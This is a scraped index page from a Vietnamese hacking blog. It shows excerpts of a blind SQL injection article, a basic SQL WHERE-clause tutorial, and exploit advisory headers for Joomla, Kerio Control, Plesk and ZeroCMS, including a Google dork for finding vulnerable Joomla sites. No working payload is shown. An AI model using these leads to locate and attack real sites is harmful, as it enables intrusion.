Mr.Quay's Blog

<div class="summary" style="background-color: white; border: 0px; color: #5f5f5f; font-family: "Times New Roman", Times, serif; font-size: 14px; font-stretch: normal; font-weight: bold; line-height: 18px; margin-bottom: 10px !important; margin-top: 15px !important; padding: 0px !important; text-align: justify; vertical-align: baseline;">
Tấn công nhúng mã SQL, hay còn gọi là SQL injection (Structured Query Language injection), là một dạng tấn công phổ biến nhất hiện nay, nhằm vào cơ sở dữ liệu SQL. Trong các dạng tấn công SQL injection, Blind SQL injection là dạng rất phổ biến. Xuất phát từ việc tối ưu khai thác lỗ hổng Blind SQL injection trong truy vấn sử dụng mệnh đề ORDER BY, bài viết này trình bày về các phương pháp khai thác, tối ưu Blind SQL injection nói chung và lỗ hổng Blind SQL trong truy vấn sử dụng mệnh đề ORDER BY nói riêng đồng thời đưa ra một góc nhìn, phương pháp tiếp cận mới trong việc tối ưu hóa tấn công này.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13.2px; line-height: 19.8px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<div style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">
Khai thác lỗ hổng Blind SQL injection trong truy vấn sử dụng mệnh đề ORDER BY </div>
<div style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">
Mệnh đề ORDER BY trong truy vấn SQL </div>
<div style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">
Thông thường, để truy xuất lấy dữ liệu trên máy chủ CSDL, chúng ta thường sử dụng mệnh đề “SELECT”. Cấu trúc của một truy vấn SQL sử dụng mệnh đề “SELECT” như sau: <div style="border: 0px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://antoanthongtin.vn/Portals/0/UploadImages/News/Images/antoanthongtin.vn-SQL_1.jpg" style="border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"></div></div></div>

Tối ưu hóa tấn công BLIND SQL INJECTION

Tấn công nhúng mã SQL, hay còn gọi là SQL injection (Structured Query Language injection), là một dạng tấn công phổ biến nhất hiện nay, nhằ...

Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

Bypass Web Application Firewalls By Simple Trick

Joomla component com_mydyngallery sql injection

‪# ‎ Exploit‬ Title: Joomla component com_mydyngallery sql injection # # Google Dork: inurl:index.php?option=com_mydyngallery #

<div class="line number1 index0 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Document Title: </code></div>
<div class="line number2 index1 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">======================</code></div>
<div class="line number3 index2 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Kerio Control <= 8.3.1 Boolean-based blind SQL Injection</code></div>

Kerio Control 8.3.1 - Blind SQL Injection

Document Title: ====================== Kerio Control <= 8.3.1 Boolean-based blind SQL Injection

<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEh4mS-Ferp7h4b5WJnJ6sNmSXbQheO5b-Z011oohroygMziLqfWRs8WcB3po34lH-Xrj73y1M1piTDjiBlLpjNRXA1hPhTM5WAGN50SNRasMDhsuR6uYn1qGWIvDsb5DlLxVr3yT5b1g8rZ9b8G54s1LOu3ts3h45DdTns=" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" class="inlineimg" src="http://forum.vnhack.us/images/smilies/LaiPro_NewYahoo/4.gif" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(34, 34, 34); font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-top: 0px; max-width: 600px; padding: 5px; vertical-align: middle;" title="big green"></a> 
 
 
By : <a class="bigusername" href="http://forum.vnhack.us/member.php?u=218" style="font-size: 14pt; margin: 0px; padding: 0px; text-decoration: none; text-shadow: white 0px 0px 0.3em, lime 0px 0px 0.3em;">ic3_princ3</a>

[TUT] sql bypass 406 cực cơ bản cho newbie

By : ic3_princ3

Mệnh đề WHERE được dùng để thiết lập điều kiện truy xuất. Mệnh đề WHERE Để truy xuất dữ liệu trong bảng theo các điều kiện nào đó, một mệnh đề WHERE có thể được thêm vào câu lệnh SELECT. Cú pháp Cú pháp mệnh đề WHERE trong câu lệnh SELECT như sau: SELECT tên_cột FROM tên_bảng WHERE tên_cột phép_toán giá_trị Trong mệnh đề WHERE, các phép toán được sử dụng là Phép toán ---- Mô tả = ------ So sánh bằng <> ------ So sánh không bằng > ------ Lớn hơn < ------ Nhỏ hơn >= ------ Lớn hơn hoặc bằng <= ------ Nhỏ hơn hoặc bằng BETWEEN ------ Nằm giữa một khoảng LIKE ------ So sánh mẫu chuỗi Lưu ý: Trong một số phiên bản của SQL, phép toán <> có thể được viết dưới dạng != Sử dụng mệnh đề WHERE Để lấy danh sách những người sống ở thành phố Sandnes, ta sử dụng mệnh đề WHERE trong câu lệnh SELECT như sau: SELECT * FROM Persons WHERE City = 'Sandnes' Bảng Persons: <img alt="" border="0" src="http://img442.imageshack.us/img442/961/sql3zr1.jpg" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(34, 34, 34); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin: 0px; padding: 5px;" /> Kết quả trả về: <img alt="" border="0" src="http://img352.imageshack.us/img352/5238/sql5db2.jpg" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(34, 34, 34); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 22.399999618530273px; margin: 0px; padding: 5px;" /> Sử dụng dấu nháy Lưu ý rằng ở ví dụ trên ta đã sử dụng hai dấu nháy đơn (') bao quanh giá trị điều kiện 'Sandnes'. SQL sử dụng dấu nháy đơn bao quanh các giá trị ở dạng chuỗi văn bản (text). Nhiều hệ CSDL còn cho phép sử dụng dấu nháy kép ("). Các giá trị ở dạng số không dùng dấu nháy để bao quanh. Với dữ liệu dạng chuỗi văn bản: Câu lệnh đúng: SELECT * FROM Persons WHERE FirstName = 'Tove' Câu lệnh sai: SELECT * FROM Persons WHERE FirstName = Tove Với dữ liệu dạng số: Câu lệnh đúng: SELECT * FROM Persons WHERE Year > 1965 Câu lệnh sai: SELECT * FROM Persons WHERE Year > '1965' Phép toán điều kiện LIKE Phép toán LIKE được dùng để tìm kiếm một chuỗi mẫu văn bản trên một cột. Cú pháp Cú pháp của phép toán LIKE như sau: SELECT tên_cột FROM tên_bảng WHERE tên_cột LIKE mẫu Một ký hiệu % có thể được sử dụng để định nghĩa các ký tự đại diện. % có thể được đặt trước và/hoặc sau mẫu. Sử dụng LIKE Câu lệnh SQL sau sẽ trả về danh sách những người có tên bắt đầu bằng chữ O: SELECT * FROM Persons WHERE FirstName LIKE 'O%' Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết thúc bằng chữ a: SELECT * FROM Persons WHERE FirstName LIKE '%a' Câu lệnh SQL sau sẽ trả về danh sách những người có tên chứa chuỗi la: SELECT * FROM Persons WHERE FirstName LIKE '%la%' 
<div class="box-admin" style="border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 10px; border: 2px dotted rgb(95, 253, 6); font-family: Arial, sans-serif; font-size: 12px; margin: 30px 0px 10px; padding: 0px; width: auto;">
Nguồn 123hack</div>
<div style="-webkit-text-stroke-width: 0px; background-color: #1b1b1d; clear: both; color: lime; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.399999618530273px; margin: 0px; orphans: auto; padding: 0px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>

_SQL Tổng Quan (Mệnh đề WHERE)

Mệnh đề WHERE được dùng để thiết lập điều kiện truy xuất. Mệnh đề WHERE Để truy xuất dữ liệu trong bảng theo các điều kiện nào đó, một mệnh ...

<div class="line number1 index0 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Exploit Title: Plesk SSO XXE injection (Old bug) Exploit              #</code></div>
<div class="line number2 index1 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># </code><code class="php functions" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(255, 20, 147) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Date</code><code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">: 12 06 2014                                                              #</code></div>
<div class="line number3 index2 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Exploit Author: z00                                                           #</code></div>
<div class="line number4 index3 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Software Link: http:</code><code class="php comments" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(0, 130, 0) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">//www.parallels.com/                                  #</code></div>
<div class="line number5 index4 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Version: 11.0.9 10.4.4                                                        #</code></div>
<div class="line number6 index5 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Tested on: linux all                                                          #</code></div>
<div class="line number7 index6 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="php plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><?php</code></div>
<div class="line number8 index7 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
 </div>

Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit

# Exploit Title: Plesk SSO XXE injection (Old bug) Exploit # # Date : 12 06 2014 ...

Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL

I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0

<div class="line number2 index1 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">ZeroCMS 1.0 (article_id) SQL Injection Vulnerability</code></div>
<div class="line number3 index2 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
 </div>
<div class="line number4 index3 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
 </div>
<div class="line number5 index4 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Vendor: Another Awesome Stuff</code></div>
<div class="line number6 index5 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Product web page: http://www.aas9.in/zerocms/</code></div>
<div class="line number7 index6 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Affected version: 1.0</code></div>
<div class="line number8 index7 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
 </div>
